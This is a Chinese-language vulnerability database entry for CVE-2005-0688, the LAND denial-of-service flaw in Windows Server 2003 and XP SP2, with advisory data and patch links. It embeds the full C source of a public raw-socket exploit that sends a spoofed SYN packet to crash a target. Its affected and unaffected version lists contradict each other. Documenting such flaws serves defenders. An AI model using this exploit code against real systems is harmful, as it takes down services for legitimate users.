CVE-2005-0688
CVSS5.0
发布时间 :2005-03-05 00:00:00
修订时间 :2016-10-17 23:13:42
NMCOES    

[原文]Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the "Land" vulnerability (CVE-1999-0016).


[CNNVD]Windows Server 2003 拒绝服务漏洞(CNNVD-200503-048)

        Microsoft Windows是微软发布的非常流行的操作系统。
        关闭了Windows防火墙的Windows Server 2003和XP SP2受LAND攻击的影响。攻击者可以发送设置了SYN标记的TCP报文,将源IP地址和目标IP地址及源端口和目标端口都设置为目标机器,导致15-30秒的DoS情况。
        向文件服务器发送单个LAND报文就可能导致当前连接到服务器上所有工作站的Windows explorer僵死,服务器的CPU使用率达到100%。有时有漏洞服务器上的网络监控甚至无法嗅探的出恶意的报文。使用tcpreplay重现攻击可以导致网络完全瘫痪。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:4978Server 2003 Object Management Vulnerability
oval:org.mitre.oval:def:482Spoofed Connection Request Vulnerability
oval:org.mitre.oval:def:1685WinXP Land Vulnerability
oval:org.mitre.oval:def:1288Win2k Land Vulnerability
oval:gov.nist.fdcc.patch:def:861MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
oval:gov.nist.USGCB.patch:def:861MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0688
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0688
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-048
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111005099504081&w=2
(UNKNOWN)  BUGTRAQ  20050305 Windows Server 2003 and XP SP2 LAND attack vulnerability
http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx
(VENDOR_ADVISORY)  MS  MS05-019
http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx
(UNKNOWN)  MS  MS06-064
http://www.securityfocus.com/archive/1/archive/1/449179/100/0/threaded
(UNKNOWN)  HP  HPSBST02161
http://www.vupen.com/english/advisories/2006/3983
(UNKNOWN)  VUPEN  ADV-2006-3983

- 漏洞信息

Windows Server 2003 拒绝服务漏洞
中危 其他
2005-03-05 00:00:00 2005-10-20 00:00:00
远程  
        Microsoft Windows是微软发布的非常流行的操作系统。
        关闭了Windows防火墙的Windows Server 2003和XP SP2受LAND攻击的影响。攻击者可以发送设置了SYN标记的TCP报文,将源IP地址和目标IP地址及源端口和目标端口都设置为目标机器,导致15-30秒的DoS情况。
        向文件服务器发送单个LAND报文就可能导致当前连接到服务器上所有工作站的Windows explorer僵死,服务器的CPU使用率达到100%。有时有漏洞服务器上的网络监控甚至无法嗅探的出恶意的报文。使用tcpreplay重现攻击可以导致网络完全瘫痪。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx
        http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx

- 漏洞信息 (861)

MS Windows XP/2003 Remote Denial of Service Exploit (EDBID:861)
windows dos
2005-03-07 Verified
0 RusH
N/A [点击下载]
/* Added Line #1 - BSD_SOURCE!!!!  /str0ke */

#define _BSD_SOURCE

#include <stdio.h> 
#include <ctype.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <netinet/in_systm.h> 
#include <netinet/ip.h> 
#include <netinet/tcp.h> 
#include <sysexits.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <sys/types.h> 

/*  
Windows Server 2003 and XP SP2 remote DoS exploit 
Tested under OpenBSD 3.6 at WinXP SP 2 
Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru 
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor 
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy 
All rights reserved. 
*/ 

//checksum function by r0ach 
u_short checksum (u_short *addr, int len) 
{ 
u_short *w = addr; 
int i = len; 
int sum = 0; 
u_short answer; 
while (i > 0) 
{ 
sum += *w++; 
i-=2; 
} 
if (i == 1) sum += *(u_char *)w; 
sum = (sum >> 16) + (sum & 0xffff); 
sum = sum + (sum >> 16); 
return (~sum); 
} 
int main(int argc, char ** argv) 
{ 
struct in_addr src, dst; 
struct sockaddr_in sin; 
struct _pseudoheader { 
struct in_addr source_addr; 
struct in_addr destination_addr; 
u_char zero; 
u_char protocol; 
u_short length; 
} pseudoheader; 
struct ip * iph; 
struct tcphdr * tcph; 
int mysock; 
u_char * packet; 
u_char * pseudopacket; 
int on = 1; 
if( argc != 3) 
{ 
fprintf(stderr, "r57windos.c by __blf\n"); 
fprintf(stderr, "RusH Security Team\n"); 
fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]); 
return EX_USAGE; 
} 
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) 
{ 
perror("malloc()\n"); 
return EX_OSERR; 
} 
inet_aton(argv[1], &src); 
inet_aton(argv[1], &dst); 
iph = (struct ip *) packet; 
iph->ip_v = IPVERSION; 
iph->ip_hl = 5; 
iph->ip_tos = 0; 
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); 
iph->ip_off = htons(IP_DF); 
iph->ip_ttl = 255; 
iph->ip_p = IPPROTO_TCP; 
iph->ip_sum = 0; 
iph->ip_src = src; 
iph->ip_dst = dst; 
tcph = (struct tcphdr *)(packet +sizeof(struct ip)); 
tcph->th_sport = htons(atoi(argv[2])); 
tcph->th_dport = htons(atoi(argv[2])); 
tcph->th_seq = ntohl(rand()); 
tcph->th_ack = rand(); 
tcph->th_off = 5; 
tcph->th_flags = TH_SYN;  // setting up TCP SYN flag here 
tcph->th_win = htons(512); 
tcph->th_sum = 0; 
tcph->th_urp = 0; 
pseudoheader.source_addr = src; 
pseudoheader.destination_addr = dst; 
pseudoheader.zero = 0; 
pseudoheader.protocol = IPPROTO_TCP; 
pseudoheader.length = htons(sizeof(struct tcphdr)); 
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) 
{ 
perror("malloc()\n"); 
return EX_OSERR; 
} 
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); 
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); 
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); 
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); 
if(!mysock) 
{ 
perror("socket!\n"); 
return EX_OSERR; 
} 
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) 
{ 
perror("setsockopt"); 
shutdown(mysock, 2); 
return EX_OSERR; 
} 
sin.sin_family = PF_INET; 
sin.sin_addr = dst; 
sin.sin_port = htons(80); 
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) 
{ 
perror("sendto()\n"); 
shutdown(mysock, 2); 
return EX_OSERR; 
} 
printf("Packet sent. Remote machine should be down.\n"); 
shutdown(mysock, 2); 
return  EX_OK; 
} 

// milw0rm.com [2005-03-07]
		

- 漏洞信息

14578
Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land)
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Microsoft Windows contains a flaw that may allow a remote denial of service. The issue is triggered when sending a TCP packet with the SYN flag set and the same destination and source address and port, which causes the system to consume all available CPU resources, resulting in a loss of availability.

- 时间线

2005-03-05 2005-02-25
2005-03-05 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft IPv6 TCP/IP Loopback LAND Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 13658
Yes No
2005-05-17 12:00:00 2006-10-12 10:24:00
Konrad Malewski <koyot@MOON.ONDRASZEK.DS.POLSL.GLIWICE.PL> is credited with the discovery of this issue.

- 受影响的程序版本

Sun SunOS 4.1.4
Sun SunOS 4.1.3 _U1
SCO Unixware 2.1
SCO Open Server 5.0
SCO Open Desktop 3.0
SCO CMW+ 3.0
Novell Netware 4.1
NetBSD NetBSD 1.2.1
NetBSD NetBSD 1.2
NetBSD NetBSD 1.1
NetBSD NetBSD 1.0
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 3.5.1
Microsoft Windows 95
Marconi ATM Switch 7.0.1
Marconi ATM Switch 6.1.1
Linux kernel 2.0.31
Linux kernel 2.0.30
HP HP-UX (VVOS) 10.24
HP HP-UX 11.0
HP HP-UX 10.30
HP HP-UX 10.20
HP HP-UX 10.16
HP HP-UX 10.10
HP HP-UX 10.1 0
HP HP-UX 10.0 1
HP HP-UX 10.0
HP HP-UX 9.0
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
Cisco IOS/700 1.0
Cisco IOS 11.2
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
BSDI BSD/OS 2.1
BSDI BSD/OS 2.0.1
BSDI BSD/OS 2.0
BSDI BSD/OS 1.1
Avaya Modular Messaging (MAS) 3.0
NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1 .x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- 不受影响的程序版本

NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1 .x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- 漏洞讨论

The Microsoft Windows IPv6 TCP/IP stack is prone to a 'loopback' condition initiated by sending a TCP packet with the 'SYN' flag set and the source address and port spoofed to equal the destination source and port.

When a packet of this type is handled, an infinite loop is initiated and the affected system halts.

A remote attacker may exploit this issue to deny service for legitimate users.

- 漏洞利用

The following exploit is available:

- 解决方案

Microsoft has released advisories and fixes to address this issue. Please see the referenced advisories for more information on obtaining and applying fixes.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows NT Enterprise Server 4.0 SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium SP1

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows NT Server 4.0 SP3

Microsoft Windows NT Terminal Server 4.0 SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows NT Workstation 4.0 SP3

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows XP Professional

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows XP 64-bit Edition

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

HP HP-UX 10.0 1

HP HP-UX 10.0

HP HP-UX 10.10

HP HP-UX 10.16

HP HP-UX 10.20

HP HP-UX (VVOS) 10.24

HP HP-UX 10.30

HP HP-UX 11.0

FreeBSD FreeBSD 2.2.5

SCO Open Server 5.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站